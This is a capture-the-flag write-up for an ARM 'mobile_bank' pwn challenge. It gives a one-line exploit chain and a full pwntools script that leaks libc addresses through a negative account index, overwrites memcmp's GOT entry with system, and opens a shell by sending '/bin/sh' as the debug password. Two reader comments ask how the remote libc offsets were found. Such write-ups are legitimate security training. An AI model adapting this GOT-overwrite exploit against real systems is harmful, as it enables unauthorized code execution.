Rating: 3.0

Account index can be negative -> leak libc from GOT -> overwrite memcmp to system -> enable debug with "/bin/sh" as password.

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *
import monkeyhex

host = 'pwn-04.v7frkwrfyhsjtbpfcppnu.ctfz.one'
port = 1337
context.arch = 'arm'
context.log_level = 'INFO'
context.terminal = ['tmux', 'splitw', '-h']
gdbargs = """
b *0x1131c
b memset
continue
"""

def set_id(idx):
p.sendline('2')
p.recvuntil('id: ')
p.sendline(str(idx))
p.recvuntil('choice: ')

def set_note(note):
p.sendline('3')
p.recvuntil('note: ')
p.sendline(note)
p.recvuntil('choice: ')

def leak(addr): # only for 0x..0 or 0x008, can read from value field
p.sendline('2')
p.recvuntil('id: ')
p.sendline(str((addr - 0x22088) / 8))
p.recvuntil('choice: ')
p.sendline('5')
p.recvuntil('value: ')
leak = p32(int(p.recvuntil('$, ')[:-3]), sign='signed')
p.recvuntil('choice: ')
return u32(leak)

# p = gdb.debug('./mobile_bank', gdbscript=gdbargs)
p = remote(host, port)
p.recvuntil('choice: ')

set_id(0)
set_note("Hey!")

# [0x22050] memcmp@GLIBC_2.4
# puts: 0xb6c8a6b1
memcmp = leak(0x22050)
# [0x22038] strcpy@GLIBC_2.4
# strcpy: 0xb6c9a0c1
strcpy = leak(0x22038)

# LOCAL
libc_base = strcpy - 0x73960
system = libc_base + 0x37600

# REMOTE
libc_base = strcpy - 0x560c0
system = libc_base + 0x2c584

log.success('strcpy: 0x%08x' % strcpy)
log.success('memcmp: 0x%08x' % memcmp)
log.success('libc: 0x%08x' % libc_base)
log.success('system: 0x%08x' % system)

v = (system - memcmp) % 2**32

memcmp = leak(0x22050)
log.success('memcmp: 0x%08x' % memcmp)
while v > 0x7fffffff:
p.sendline('4')
p.recvuntil('value: ')
p.sendline(str(0x7fffffff))
v -= 0x7fffffff
p.sendline('4')
p.recvuntil('value: ')
p.sendline(str(v))
memcmp = leak(0x22050)
log.success('memcmp: 0x%08x' % memcmp) # <system>

p.sendline('6\n/bin/sh')

p.interactive()
```

bo8July 23, 2018, 11:16 a.m.

How do you know remote system's offset? The challenge doesn't provide libc.


Ne0July 23, 2018, 11:47 a.m.

how can u find the correct libc ?